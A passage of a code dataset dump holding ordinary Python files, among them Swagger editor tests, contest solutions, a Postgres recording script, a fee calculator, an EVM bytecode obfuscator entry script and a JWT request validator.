This is a minimum requirement for CORS\n \"method.response.header.Access-Control-Allow-Origin\": origins\n }\n\n options_config = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(\n origins, headers, methods)\n\n actual = options_config[_X_INTEGRATION][\"responses\"][\"default\"][\"responseParameters\"]\n self.assertEquals(expected, actual)\n\n def test_max_age_can_be_set_to_zero(self):\n headers = None\n methods = \"methods\"\n origins = \"origins\"\n max_age = 0\n\n expected = {\n \"method.response.header.Access-Control-Allow-Methods\": methods,\n \"method.response.header.Access-Control-Allow-Origin\": origins,\n \"method.response.header.Access-Control-Max-Age\": max_age\n }\n\n options_config = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(\n origins, headers, methods, max_age)\n\n actual = options_config[_X_INTEGRATION][\"responses\"][\"default\"][\"responseParameters\"]\n self.assertEquals(expected, actual)\n\n\nclass TestSwaggerEditor_make_cors_allowed_methods_for_path(TestCase):\n\n def setUp(self):\n self.editor = SwaggerEditor({\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"get\": {},\n \"POST\": {},\n \"DeLeTe\": {}\n },\n \"/withany\": {\n \"head\": {},\n _X_ANY_METHOD: {}\n },\n \"/nothing\": {\n }\n }\n })\n\n def test_must_return_all_defined_methods(self):\n path = \"/foo\"\n expected = \"DELETE,GET,OPTIONS,POST\" # Result should be sorted alphabetically\n\n actual = self.editor._make_cors_allowed_methods_for_path(path)\n self.assertEquals(expected, actual)\n\n def test_must_work_for_any_method(self):\n path = \"/withany\"\n expected = \"DELETE,GET,HEAD,OPTIONS,PATCH,POST,PUT\" # Result should be sorted alphabetically\n\n actual = self.editor._make_cors_allowed_methods_for_path(path)\n self.assertEquals(expected, actual)\n\n def test_must_work_with_no_methods(self):\n path = \"/nothing\"\n expected = \"OPTIONS\"\n\n actual = self.editor._make_cors_allowed_methods_for_path(path)\n self.assertEquals(expected, actual)\n\n def test_must_skip_non_existent_path(self):\n path = \"/no-path\"\n expected = \"\"\n\n actual = 
self.editor._make_cors_allowed_methods_for_path(path)\n        self.assertEquals(expected, actual)\n\n\nclass TestSwaggerEditor_normalize_method_name(TestCase):\n\n    @parameterized.expand([\n        param(\"GET\", \"get\", \"must lowercase\"),\n        param(\"PoST\", \"post\", \"must lowercase\"),\n        param(\"ANY\", _X_ANY_METHOD, \"must convert any method\"),\n        param(None, None, \"must skip empty values\"),\n        param({\"a\": \"b\"}, {\"a\": \"b\"}, \"must skip non-string values\"),\n        param([1, 2], [1, 2], \"must skip non-string values\"),\n    ])\n    def test_must_normalize(self, input, expected, msg):\n        self.assertEquals(expected, SwaggerEditor._normalize_method_name(input), msg)\n\n\nclass TestSwaggerEditor_swagger_property(TestCase):\n\n    def test_must_return_copy_of_swagger(self):\n\n        input = {\n            \"swagger\": \"2.0\",\n            \"paths\": {}\n        }\n\n        editor = SwaggerEditor(input)\n        self.assertEquals(input, editor.swagger)  # They are equal in content\n        input[\"swagger\"] = \"3\"\n        self.assertEquals(\"2.0\", editor.swagger[\"swagger\"])  # Editor works on a diff copy of input\n\n        editor.add_path(\"/foo\", \"get\")\n        self.assertEquals({\"/foo\": {\"get\": {}}}, editor.swagger[\"paths\"])\n        self.assertEquals({}, input[\"paths\"])  # Editor works on a diff copy of input\n\n\nclass TestSwaggerEditor_is_valid(TestCase):\n\n    @parameterized.expand([\n        param(SwaggerEditor.gen_skeleton()),\n\n        # Dict can contain any other unrecognized properties\n        param({\"swagger\": \"anyvalue\", \"paths\": {}, \"foo\": \"bar\", \"baz\": \"bar\"})\n    ])\n    def test_must_work_on_valid_values(self, swagger):\n        self.assertTrue(SwaggerEditor.is_valid(swagger))\n\n    @parameterized.expand([\n        ({}, \"empty dictionary\"),\n        ([1, 2, 3], \"array data type\"),\n        ({\"paths\": {}}, \"missing swagger property\"),\n        ({\"swagger\": \"hello\"}, \"missing paths property\"),\n        ({\"swagger\": \"hello\", \"paths\": [1, 2, 3]}, \"array value for paths property\"),\n    ])\n    def test_must_fail_for_invalid_values(self, data, case):\n        self.assertFalse(SwaggerEditor.is_valid(data), \"Swagger dictionary with {} must not be valid\".format(case))\n","repo_name":"udinachmany/lambda-hello-world","sub_path":"tests/swagger/test_swagger.py","file_name":"test_swagger.py","file_ext":"py","file_size_in_byte":22032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70741854314","text":"n, q = map(int, input().split())\nal = list(map(int, input().split()))\nlrvl = [list(map(int, input().split())) for _ in range(q)]\n\nif n == 1:\n    print(*[0]*q, sep=\"\\n\")\n    exit()\n\n# the only information we need is each element's difference with its neighbors\ndif = []  # dif[i]: [d1, d2]: diff with previous, diff with next (self - other) -> self is dn higher than the other\nfor i in range(n):\n    if i == 0:\n        dif.append([0, al[i] - al[i + 1]])\n    elif i == n - 1:\n        dif.append([al[i] - al[i - 1], 0])\n    else:\n        dif.append([al[i] - al[i - 1], al[i] - al[i + 1]])\n\nans = sum([abs(a - b) for a, b in zip(al, al[1:])])\nfor l, r, v in lrvl:\n    l, r = l - 1, r - 1\n    # handle the left endpoint\n    bef_l = abs(dif[l][0])\n    if l > 0:\n        dif[l][0] += v\n        dif[l - 1][1] -= v\n    crt_l = abs(dif[l][0])\n    # handle the right endpoint\n    bef_r = abs(dif[r][1])\n    if r < n - 1:\n        dif[r][1] += v\n        dif[r + 1][0] -= v\n    crt_r = abs(dif[r][1])\n    ans += (crt_l + crt_r) - (bef_l + bef_r)\n\n    print(ans)","repo_name":"ymsk-sky/atcoder_part3","sub_path":"typical90/064_Uplift.py","file_name":"064_Uplift.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20100114998","text":"import psycopg2\nimport datetime\n\ncon = psycopg2.connect(\n    
database=\"Record_bd\",\n    user=\"postgres\",\n    password=\"12345\",\n    host=\"localhost\",\n    port=\"5432\"\n)\n\n\ndef insert_record(channel, record_type, record, record_path, datetime_start, datetime_stop, record_length,\n                  record_extension, snapshot_path):\n    cur = con.cursor()\n    try:\n        cur.execute(\"INSERT INTO record_info (id_channel, record_type, id_record, record_path, datetime_start, \"\n                    \"datetime_stop, record_length, record_extension, snapshot_path) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s)\",\n                    (channel, record_type, record, record_path, datetime_start, datetime_stop, record_length,\n                     record_extension, snapshot_path))\n    except psycopg2.DatabaseError as err:\n        print(\"Error: \", err)\n    else:\n        con.commit()\n    con.close()\n\n\ndef select_record(dt_start, dt_stop):\n    record = None  # initialized so a DatabaseError cannot leave it unbound below\n    cur = con.cursor()\n    sql = \"SELECT * FROM record_info WHERE datetime_start > %s AND datetime_stop < %s\"\n    try:\n        cur.execute(sql, (dt_start, dt_stop))\n        record = cur.fetchall()  # returns all rows\n        print(record)\n    except psycopg2.DatabaseError as err:\n        print(\"Error: \", err)\n    else:\n        con.commit()\n    con.close()\n    if record is not None:\n        return record\n\n\nstart = datetime.datetime(2022, 7, 6, 11, 30, 40)\nstop = datetime.datetime(2022, 7, 6, 15, 22, 56)\nselect_record(start, stop)\n# now = datetime.datetime.now()\n# insert_record(1, 'con', 1, '/file', now, now, 12, 'mp4', '/file')\n","repo_name":"msamsonova/repository_record_db","sub_path":"record_bd.py","file_name":"record_bd.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31697065367","text":"matriz = [[], [], []]\npar = soma = maior = 0\nfor i in range(0, 3):\n    for c in range(0, 3):\n        matriz[i].append(int(input(f'Digite um valor para [{i}, {c}]: ')))\n        if matriz[i][c] % 2 == 0:\n            par += matriz[i][c]\n        if c == 2:\n            soma += matriz[i][2]\n        if i == 1:\n            if c == 0:\n                maior = matriz[1][c]\n            elif matriz[1][c] > maior:\n                maior = matriz[1][c]\nprint(30 * '-=')\nfor i in range(0, 3):\n    for c in range(0, 3):\n        print(f'[{matriz[i][c]:^5}]', end='')\n    print(end='\\n')\nprint(30 * '-=')\nprint(f'A soma dos valores pares é {par}.'\n      f'\\nA soma dos valores da terceira coluna é {soma}.'\n      f'\\nO maior valor da segunda linha é {maior}.')\n","repo_name":"henrique-sk/Python-Curso-em-Video","sub_path":"Mundo01-03/Exercicios/ex087.py","file_name":"ex087.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74822084071","text":"# Created by hiddencoder at 23.04.2019\r\nimport json\r\nimport re\r\nimport emoji\r\n\r\n\r\ndef give_emoji_free_text(dict_):\r\n    text = dict_['text'].encode()\r\n    allchars = [str for str in text.decode('utf-8')]\r\n    emoji_list = [c for c in allchars if c in emoji.UNICODE_EMOJI]\r\n    clean_text = ' '.join([str for str in text.decode('utf-8').split() if\r\n                           not any(i in str for i in emoji_list)])\r\n    dict_['text'] = clean_text + \" \"\r\n    return dict_\r\n\r\nclass DataExtractor:\r\n    \"\"\"\r\n    Class which allows data extraction.\r\n    \"\"\"\r\n\r\n    def __init__(self, file, encoding=\"utf-8-sig\"):\r\n        self.__file = file\r\n        self.__encoding = encoding\r\n        self.__json_dump()\r\n        self.__result_data = self.__get_data()\r\n\r\n    def __json_read(self):\r\n        \"\"\"\r\n        Reader.\r\n\r\n        Used for JSON-file reading\r\n        :param file_name: name of the file to open\r\n        :param encoding: file encoding (utf-8 by default)\r\n        :return: reader_object\r\n        
\"\"\"\r\n with open(self.__file, 'r', encoding=self.__encoding) as file:\r\n\r\n data = json.load(file)\r\n if data['chats']['list']:\r\n list_to_insert = data['chats']['list']\r\n else:\r\n raise ValueError\r\n\r\n return list_to_insert\r\n\r\n def __json_dump(self):\r\n with open(\"data.json\", 'w', encoding=self.__encoding) as file:\r\n list_to_insert = self.__json_read()\r\n for i in range(len(list_to_insert)):\r\n tmp_messages = list_to_insert[i]['messages']\r\n tmp_messages = list(filter(lambda x: not isinstance(x[\"text\"], list), tmp_messages))\r\n list_to_insert[i]['messages'] = tmp_messages\r\n # for i in list_to_insert: print(i)\r\n for i in list_to_insert:\r\n i['messages'] = list(map(lambda x: give_emoji_free_text(x), i[\"messages\"]))\r\n json.dump(list_to_insert, file)\r\n\r\n def __get_data(self):\r\n with open(\"data.json\", \"r\", encoding=self.__encoding) as file:\r\n data = json.load(file)\r\n return data\r\n\r\n @property\r\n def file(self):\r\n return self.__file\r\n\r\n @property\r\n def result_data(self):\r\n return self.__result_data\r\n","repo_name":"andriymurovanyi/Sentiment-analisys","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1672124646","text":"import sys\r\n\r\nboard = [list(map(int, sys.stdin.readline().strip().split())) for _ in range(5)]\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, -1, 0, 1]\r\n\r\n\r\ndef dfs(board, start):\r\n return dfs_helper(start, 0, \"\")\r\n\r\n\r\nresult = set([])\r\n\r\n\r\ndef dfs_helper(start, depth, cur):\r\n if depth == 6:\r\n result.add(cur)\r\n return\r\n\r\n for i in range(4):\r\n nx = start[0] + dx[i]\r\n ny = start[1] + dy[i]\r\n if 0 <= nx <= 4 and 0 <= ny <= 4:\r\n dfs_helper([nx, ny], depth + 1, cur + str(board[ny][nx]))\r\n\r\n\r\nfor y, row in enumerate(board):\r\n for x, num in enumerate(row):\r\n start = [x, y]\r\n dfs(board, start)\r\n\r\nprint(len(result))\r\n","repo_name":"slackjawed12/codetest","sub_path":"백준/Silver/2210. 숫자판 점프/숫자판 점프.py","file_name":"숫자판 점프.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43905070845","text":"#!/usr/bin/env python3\n\nimport json\nfrom fx_rate import FxRate\n\n\nclass Fees:\n def __init__(self, conf_file, fx_rate):\n with open(conf_file, \"r\") as infile:\n self.conf = json.loads(infile.read())\n self.fx_rate = fx_rate\n return\n\n def get_total_buy_side_fees(self, venue, buy_price_usd=None):\n \"\"\"\n Buy side fees. All fees are denominated in USD.\n \"\"\"\n if venue == \"stockx\":\n return self.conf[venue][\"buy_shipping_usd\"]\n raise RuntimeError(\"fees: unsupported venue / unimplemented {}\".format(venue))\n\n def get_total_sell_side_fees(self, venue, sell_price_usd=None):\n \"\"\"\n Sell side fees. 
All fees are denominated in USD.\n        \"\"\"\n        if venue == \"du\":\n            if not sell_price_usd:\n                raise RuntimeError(\n                    \"sell_price_usd is required to get fees on {}\".format(venue)\n                )\n            return sell_price_usd * (\n                self.conf[venue][\"commission_percent\"]\n                + self.conf[venue][\"tech_service_percent\"]\n                + self.conf[venue][\"transfer_percent\"]\n            ) / 100 + self.fx_rate.get_spot_fx(\n                self.conf[venue][\"packaging_cny\"]\n                + self.conf[venue][\"verification_cny\"]\n                + self.conf[venue][\"service_cny\"],\n                \"CNY\",\n                \"USD\",\n            )\n        raise RuntimeError(\"fees: unsupported venue / unimplemented {}\".format(venue))\n\n    def get_shipping_cost(self, buy_venue, sell_venue):\n        \"\"\"\n        Cost of transferring the item from buy side to sell side: shipping, etc.\n        All fees are denominated in USD.\n        \"\"\"\n        if buy_venue == \"stockx\" and sell_venue == \"du\":\n            return self.conf[\"shipping\"][\"stockx_du_usd\"]\n        raise RuntimeError(\n            \"fees: unsupported venue / unimplemented {} {}\".format(\n                buy_venue, sell_venue\n            )\n        )\n\n    def get_list_price_for_sell_value(self, venue, target_value_usd, out_ccy=None):\n        \"\"\"\n        The reverse of `get_total_sell_side_fees`.\n        All fees are denominated in USD unless specified otherwise.\n        \"\"\"\n        if venue == \"du\":\n            list_price_usd = (\n                target_value_usd\n                + self.fx_rate.get_spot_fx(\n                    self.conf[venue][\"packaging_cny\"]\n                    + self.conf[venue][\"verification_cny\"]\n                    + self.conf[venue][\"service_cny\"],\n                    \"CNY\",\n                    \"USD\",\n                )\n            ) / (\n                1\n                - (\n                    (\n                        self.conf[venue][\"commission_percent\"]\n                        + self.conf[venue][\"tech_service_percent\"]\n                        + self.conf[venue][\"transfer_percent\"]\n                    )\n                    / 100\n                )\n            )\n            if not out_ccy or out_ccy == \"USD\":\n                return list_price_usd\n            else:\n                return self.fx_rate.get_spot_fx(list_price_usd, \"USD\", \"CNY\")\n        raise RuntimeError(\"fees: unsupported venue / unimplemented {}\".format(venue))\n\n    def _get_income_expenditure(\n        self, buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy=None\n    ):\n        if not sell_price_ccy:\n            sell_price_usd = sell_price\n        else:\n            sell_price_usd = self.fx_rate.get_spot_fx(sell_price, sell_price_ccy, \"USD\")\n        total_expenditure = (\n            buy_price_usd\n            + self.get_total_buy_side_fees(buy_venue, buy_price_usd=buy_price_usd)\n            + self.get_shipping_cost(buy_venue, sell_venue)\n        )\n        total_income = sell_price_usd - self.get_total_sell_side_fees(\n            sell_venue, sell_price_usd=sell_price_usd\n        )\n        return total_income, total_expenditure\n\n    def get_profit_percent(\n        self, buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy=None\n    ):\n        \"\"\"\n        How much profit, as a ratio, we can make if we buy and sell at the given prices.\n        Fees on both sides are applied in this function.\n        Ratio is calculated as:\n        total_expenditure = buy_price + buy_fees + shipping_buy_to_sell\n        total_income = sell_price - sell_fees\n        ratio = (total_income - total_expenditure) / total_expenditure\n        \n        All fees are denominated in USD unless specified otherwise.\n        \"\"\"\n        total_income, total_expenditure = self._get_income_expenditure(\n            buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy\n        )\n        profit_ratio = (total_income - total_expenditure) / total_expenditure\n        return profit_ratio\n\n    def get_profit_value(\n        self, buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy=None\n    ):\n        \"\"\"\n        Similar to `get_profit_percent` but in value\n        \"\"\"\n        total_income, total_expenditure = self._get_income_expenditure(\n            buy_venue, sell_venue, buy_price_usd, sell_price, sell_price_ccy\n        )\n        return total_income - total_expenditure\n\n    def 
get_target_list_price_for_target_ratio(\n self, buy_venue, sell_venue, target_ratio, buy_price_usd, out_ccy=None\n ):\n \"\"\"\n The reverse of `get_profit_percent`.\n All fees are denominated in USD unless specified otherwise.\n \"\"\"\n total_expenditure = (\n buy_price_usd\n + self.get_total_buy_side_fees(buy_venue, buy_price_usd=buy_price_usd)\n + self.get_shipping_cost(buy_venue, sell_venue)\n )\n total_income = total_expenditure * (1 + target_ratio)\n list_price = self.get_list_price_for_sell_value(\n sell_venue, total_income, out_ccy=out_ccy\n )\n return list_price\n\n\nif __name__ == \"__main__\":\n fx_rate = FxRate()\n fees = Fees(\"fees.json\", fx_rate)\n","repo_name":"zhehaowang/sneaky","sub_path":"src/strategy/fees.py","file_name":"fees.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"12037509712","text":"from alembic import context\n\nfrom transiter.db import dbconnection, models\n\n# this is the Alembic Config object, which provides\n# access to the values within the .ini file in use.\nconfig = context.config\n\ntarget_metadata = models.Base.metadata\n\n\ndef run_migrations_online():\n \"\"\"Run migrations in 'online' mode.\n\n In this scenario we need to create an Engine\n and associate a connection with the context.\n\n \"\"\"\n connectable = dbconnection.create_engine()\n\n with connectable.connect() as connection:\n context.configure(connection=connection, target_metadata=target_metadata)\n\n with context.begin_transaction():\n context.run_migrations()\n\n\nrun_migrations_online()\n","repo_name":"jamespfennell/transiter-python","sub_path":"transiter/db/alembic/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4341204695","text":"n = int(input())\np = [*map(int, input().split())]\nq = [*map(int, input().split())]\nfrom itertools import permutations\n\nfor i, v in enumerate(permutations(range(1, n + 1))):\n if all([True if t == p[j] else False for j, t in enumerate(v)]):\n a = i\n if all([True if t == q[j] else False for j, t in enumerate(v)]):\n b = i\nprint(abs(a - b))\n","repo_name":"thanaism/online-judge","sub_path":"python/abc-c/abc150_c.py","file_name":"abc150_c.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5575419652","text":"import torch.optim as optim\nfrom .scheduler import CosineWithRestarts\n\n\ndef create_optimizer(params, mode='adam', base_lr=1e-3, t_max=10):\n if mode == 'adam':\n optimizer = optim.Adam(params, base_lr)\n elif mode == 'sgd':\n optimizer = optim.SGD(params, base_lr, momentum=0.9, weight_decay=4e-5)\n else:\n raise NotImplementedError(mode)\n\n scheduler = CosineWithRestarts(optimizer, t_max)\n\n return optimizer, scheduler\n","repo_name":"nyoki-mtl/pytorch-segmentation","sub_path":"src/utils/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":372,"dataset":"github-code","pt":"72"} +{"seq_id":"33131021066","text":"from typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nfrom ._const import METHODS\nfrom ._dataclasses import ExecutionBlock\nfrom ._dataclasses import ParserState\nfrom ._parsers import BlockParser\nfrom 
.methods import Methods\nfrom .methods import MethodsError\n\n\ndataType = Dict[str, Dict[str, Union[List[str], Dict[str, Any], str]]]\nreturnDataType = Dict[str, Dict[str, Any]] # I'm not sure about this\nparserReturnType = Union[Tuple[returnDataType,\n None, None], Tuple[None, int, str]]\n\n\ndef verify_data_type(data: object) -> dataType:\n # I'll implement this later\n if isinstance(data, dict):\n return data\n\n return dict()\n\n\ndef block_executor(ebs: List[ExecutionBlock], pes: List[ExecutionBlock], methods: Methods) -> parserReturnType:\n\n pes_ids = {i.header.id: i for i in pes}\n req_methods_dict = {i: getattr(methods, i.lower()) for i in METHODS}\n block_output_err: Optional[Tuple[None, int, str]] = None\n\n def block_output(block: ExecutionBlock) -> Any:\n nonlocal block_output_err\n\n q_data = {}\n\n for q in block.query:\n try:\n q_data[q.alias if q.alias else q.query] = req_methods_dict[block.header.method](\n q.args, q.contents)\n except NotImplementedError:\n block_output_err = (\n None, 611, f\"{block.header.method!r} is not implemented\")\n return None\n except MethodsError as e:\n block_output_err = (\n None, e.code, e.msg\n )\n return None\n\n if block.after:\n q_data[\"after\"] = block_output(pes_ids[block.after])\n\n return q_data\n\n temp_data = {}\n\n for eb in ebs:\n if eb.after:\n if eb.after not in pes_ids:\n return (None, 610,\n f\"The 'after' execution block {eb.after!r} does not exists for the block {eb.header.id!r}\")\n\n val = block_output(eb)\n\n if val:\n temp_data[eb.header.id] = val\n\n else:\n break\n\n return (temp_data, None, None) if not block_output_err else block_output_err\n\n\ndef parse(methods: Methods, data: object) -> parserReturnType:\n\n curr_state = ParserState()\n\n methods_dict = {i: getattr(\n methods, f\"{i.lower()}_query_parser\", None) for i in METHODS}\n\n data = verify_data_type(data)\n\n if data:\n for k, v in data.items():\n\n eb, err, msg = BlockParser({k: v}, methods_dict).parse()\n\n if eb:\n if eb.header.id in curr_state.ids:\n return (None, 607, \"Two execution blocks cannot have the same ID\")\n else:\n curr_state.ids.append(eb.header.id)\n\n if eb.header.property_key == \"pe\":\n curr_state.pes.append(eb)\n else:\n curr_state.ebs.append(eb)\n else:\n if err and msg:\n return (None, err, msg)\n\n return block_executor(ebs=curr_state.ebs, pes=curr_state.pes, methods=methods)\n\n return (None, 600, \"Invalid Data\")\n","repo_name":"Adwaith-Rajesh/loafang","sub_path":"loafang/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"1771450204","text":"import pandas as pd\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom sklearn.utils import shuffle\r\nfrom HandleImbalances import use_smote\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv1D, MaxPooling1D, Dense, Flatten, Dropout\r\nfrom tensorflow.keras.metrics import Precision, Recall, AUC\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\n\r\ntrain_dataset_df = pd.read_csv('./Result/OSACT2022-taskA-train.csv', usecols=['tweet','off_label'], encoding='utf-8')\r\neval_dataset_df = pd.read_csv('./Result/OSACT2022-taskA-dev.csv', usecols=['tweet','off_label'], encoding='utf-8')\r\n\r\ntfidf_vectorizer = TfidfVectorizer(lowercase=False, encoding='utf-8', input='content', 
ngram_range=(1,2), token_pattern=r\"(?u)\\b\\w\\w+\\b\", min_df=2, max_df=0.5, max_features=300)\r\nfeatures = tfidf_vectorizer.fit_transform(train_dataset_df['tweet'])\r\n\r\nfeatures_df = pd.DataFrame(features.todense(), columns=tfidf_vectorizer.get_feature_names())\r\n\r\nx_train = features_df.values\r\ny_train = to_categorical(train_dataset_df['off_label'], num_classes=2)\r\n\r\nx_train, y_train = shuffle(x_train, y_train)\r\n\r\neval_tfidf_vectorizer = TfidfVectorizer(lowercase=False, encoding='utf-8', input='content', ngram_range=(1,2), token_pattern=r\"(?u)\\b\\w\\w+\\b\", min_df=2, max_df=0.5, vocabulary=tfidf_vectorizer.get_feature_names())\r\neval_features = eval_tfidf_vectorizer.fit_transform(eval_dataset_df['tweet'])\r\neval_features_df = pd.DataFrame(eval_features.todense(), columns=tfidf_vectorizer.get_feature_names())\r\n\r\nx_eval = eval_features_df.values\r\ny_eval = to_categorical(eval_dataset_df['off_label'], num_classes=2)\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv1D(filters=64, kernel_size=4, activation='relu', input_shape=(x_train.shape[1], 1)))\r\nmodel.add(Conv1D(filters=64, kernel_size=3, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=2, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=1))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(x_train.shape[1], activation='relu'))\r\nmodel.add(Dense(y_train.shape[1], activation='sigmoid'))\r\nmodel.compile(optimizer=Adam(learning_rate=5e-5), loss='binary_crossentropy', metrics=[Precision(), Recall(), AUC()])\r\n\r\nmodel_checkpoint_callback = ModelCheckpoint(\r\n filepath='./tfidf_temp/checkpoint',\r\n save_weights_only=True,\r\n monitor='val_precision',\r\n mode='max',\r\n save_best_only=True)\r\n\r\nmodel.fit(x_train, y_train,validation_data=(x_eval, y_eval), batch_size=32, epochs=10, verbose=2, callbacks=model_checkpoint_callback)\r\n\r\nmodel.load_weights('./tfidf_temp/checkpoint')\r\n\r\nprint(\"Saving model and weights started\")\r\nmodel_json = model.to_json()\r\nwith open('./tfidf_model/model.json', 'w') as file:\r\n file.write(model_json)\r\n\r\nmodel.save_weights('./tfidf_model/weights.h5')\r\nprint(\"Saving model and weights ended\")\r\n\r\n#tfidf model with smote over resampling technique for class imbalancing\r\n\r\nx_train_resampled, y_train_resampled = use_smote(x_train, y_train) \r\ny_train_resampled = to_categorical(y_train_resampled, num_classes = 2)\r\n\r\nmodel_checkpoint_callback = ModelCheckpoint(\r\n filepath='./tfidf_resampled_temp/checkpoint',\r\n save_weights_only=True,\r\n monitor='val_precision',\r\n mode='max',\r\n save_best_only=True)\r\n\r\nprint('Training on resampled data started')\r\n\r\nmodel.fit(x_train_resampled, y_train_resampled,validation_data=(x_eval, y_eval), batch_size=32, epochs=10, verbose=2, callbacks=model_checkpoint_callback)\r\n\r\nprint('Training on resampled data ended')\r\n\r\nmodel.load_weights('./tfidf_resampled_temp/checkpoint')\r\n\r\nprint(\"Saving model and weights started\")\r\nmodel_json = model.to_json()\r\nwith open('./tfidf_resampled_model/model.json', 'w') as file:\r\n file.write(model_json)\r\n\r\nmodel.save_weights('./tfidf_resampled_model/weights.h5')\r\nprint(\"Saving model and weights ended\")\r\n\r\n\r\n\r\n","repo_name":"ShadyZekry/TextBased-emotion-detection","sub_path":"hate-speech/hate-speech/TfidfModel.py","file_name":"TfidfModel.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} 
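The TfidfModel record above ends by serializing its Keras network twice over (architecture to model.json, weights to weights.h5). A minimal reload-and-score sketch for such artifacts, assuming the './tfidf_model/model.json' and './tfidf_model/weights.h5' files written by that script exist; x_new is a hypothetical feature matrix, not something the original script defines:

from tensorflow.keras.models import model_from_json

# Rebuild the architecture from the saved JSON, then restore the trained weights.
with open('./tfidf_model/model.json', 'r') as file:
    model = model_from_json(file.read())
model.load_weights('./tfidf_model/weights.h5')

# x_new (hypothetical) must come from a TfidfVectorizer fitted with the same
# vocabulary as at training time, e.g. via its vocabulary= argument.
# probs = model.predict(x_new)
# labels = probs.argmax(axis=1)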
+{"seq_id":"2371680852","text":"import sys\nfrom obfuscator.obfuscator import Obfuscator\nfrom utils.utils import read_file\nfrom decompiler.decompiler import evmcode_string_to_list\nfrom contract.contract import Contract\nfrom contract.metadata import *\nimport os\n\n# read evmcode file and return decompiled contract\ndef analyze_evmcode_file():\n # read file\n if len(sys.argv) < 2:\n print(\"Usage: %s \" % sys.argv[0])\n return\n filepath = sys.argv[1]\n filename = os.path.basename(filepath)\n evmcode = read_file(filepath)\n bytecode = evmcode_string_to_list(evmcode)\n \n contract = Contract(filename, bytecode) # create Contract \n\n print(\"Successfully decompiled %s\\n\" % filename)\n\n contract.update_pc()\n contract.link_jumpdest_push()\n\n return contract\n\n\n\nimport os\n\ndef write_to_file(contract):\n obfed_dir = os.path.join('examples', 'obfed')\n if not os.path.exists(obfed_dir):\n os.makedirs(obfed_dir)\n \n file_path = os.path.join(obfed_dir, contract.name + '.obf')\n with open(file_path, 'w') as f:\n f.write(contract.get_full_bytecode())\n\n\ndef main():\n #Build Contract\n contract = analyze_evmcode_file()\n obfuscator = Obfuscator(contract)\n contract.update_pc()\n obfuscator.obfuscate_contract()\n contract.update_pc()\n print(contract)\n print(\"Contract functions :\")\n print(contract.func_sig)\n write_to_file(contract)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TFori/Obfx","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1547986524","text":"import jwt\nfrom jwt import InvalidTokenError\n\nfrom yajwt.entities.jwt_key import JwtKey\nfrom yajwt.entities.jwt_token import JwtToken\nfrom yajwt.jwt_exceptions import JwtKeyNotFound\nfrom yajwt.keys_manager.jwt_keys_manager import JwtKeysManager\n\n\nclass JwtRequestsValidator:\n def __init__(self, jwt_keys_manager: JwtKeysManager):\n self.__jwt_keys_manager = jwt_keys_manager\n\n def validate(self, jwt_token: str) -> JwtToken:\n payload = self.__get_payload(jwt_token)\n team_name = payload.get(\"iss\")\n if team_name is None:\n error_message = \"Unable to get team_name from JWT token.\"\n return JwtToken(False, error_message=error_message)\n\n return self.validate_user(jwt_token, team_name)\n\n def __get_payload(self, jwt_token: str) -> dict:\n return jwt.decode(jwt_token, verify=False)\n\n def __validate(self, jwt_token: str, jwt_key: JwtKey) -> JwtToken:\n try:\n jwt.decode(jwt_token, jwt_key.key, algorithms=jwt_key.algorithm)\n return JwtToken(True, self.__get_payload(jwt_token))\n except (InvalidTokenError, ValueError) as e:\n # ValueError will raise when a public key is not properly formatted\n return JwtToken(False, error_message=str(e))\n\n def validate_user(self, jwt_token: str, team_name: str) -> JwtToken:\n try:\n jwt_key = 